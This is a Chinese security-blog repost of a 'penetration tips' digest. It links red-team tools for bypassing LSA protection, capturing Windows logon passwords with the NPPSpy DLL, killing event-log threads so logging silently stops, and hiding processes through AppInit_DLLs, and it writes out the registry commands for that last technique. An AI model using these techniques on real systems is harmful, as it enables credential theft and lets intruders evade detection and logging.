渗透Tips - 第十九期

admin 2022年1月6日03:48:39安全闲碎评论17 views1882字阅读6分16秒阅读模式


1、Violation_Pnetest


https://github.com/EvilAnne/Violation_Pnetest  

作者:广东靓仔


渗透Tips - 第十九期


2、RedTips


https://vincentyiu.com/red-team-tips

一些规避操作,避免渗透过程中被发现、掉权以及技巧等红队相关的tips

渗透Tips - 第十九期


3、绕过lsa protection


https://github.com/RedCursorSecurityConsulting/PPLKiller


渗透Tips - 第十九期

渗透Tips - 第十九期

渗透Tips - 第十九期

渗透Tips - 第十九期

渗透Tips - 第十九期


4、NPPSpy记录密码


https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy/NPPSPy.c

默认保存位置是C盘根目录,可以修改重新编译

渗透Tips - 第十九期

将DLL放入system32文件夹内

渗透Tips - 第十九期

执行ps1脚本自动添加注册表

渗透Tips - 第十九期

无需重启

渗透Tips - 第十九期



Tips 5. 破坏Windows日志记录功能


通过调用TerminateThread结束实现日志功能的线程,使得日志记录功能失效,但Windows Event Log服务没有被破坏,状态仍为正在运行

Powershell:

https://github.com/hlldz/Invoke-Phant0m

渗透Tips - 第十九期

C++:

https://github.com/3gstudent/Windwos-EventLog-Bypass


Tips 6. Win7和Windows Server 2008 R2下的进程隐藏


利用globalAPIhooks,通过修改注册表实现

下载工程:

https://github.com/subTee/AppInitGlobalHooks-Mimikatz

修改代码指定要隐藏的程序名cldr.exe,编译成cldr.dll,cldr.dll放在

C:ProgramDataMicrosoftHelpLibrary

管理员权限:

reg add "hklmSOFTWAREMicrosoftWindows NTCurrentVersionWindows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0reg add "hklmSOFTWAREMicrosoftWindows NTCurrentVersionWindows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /freg add "hklmSOFTWAREMicrosoftWindows NTCurrentVersionWindows" /v AppInit_DLLs /t REG_SZ /d "C:\ProgramData\Microsoft\HelpLibrary\cldr.dll" /f

此时,任务管理器进程列表不存在cldr.exe,Process Explorer不存在cldr.exe,Tasklist.exe不存在cldr.exe

对于64位系统:

管理员权限:

reg add "hklmSOFTWAREMicrosoftWindows NTCurrentVersionWindows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0reg add "hklmSOFTWAREMicrosoftWindows NTCurrentVersionWindows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /freg add "hklmSOFTWAREMicrosoftWindows NTCurrentVersionWindows" /v AppInit_DLLs /t REG_SZ /d "C:\ProgramData\Microsoft\HelpLibrary\cldrx64.dll" /freg add "hklmSOFTWAREMicrosoftWindows NTCurrentVersionWindows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0reg add "hklmSOFTWAREMicrosoftWindows NTCurrentVersionWindows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /freg add "hklmSOFTWAREWow6432NodeMicrosoftWindows NTCurrentVersionWindows" /v AppInit_DLLs /t REG_SZ /d "C:\ProgramData\Microsoft\HelpLibrary\cldr.dll" /f


本文始发于微信公众号(关注安全技术):渗透Tips - 第十九期

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月6日03:48:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  渗透Tips - 第十九期 http://cn-sec.com/archives/500972.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: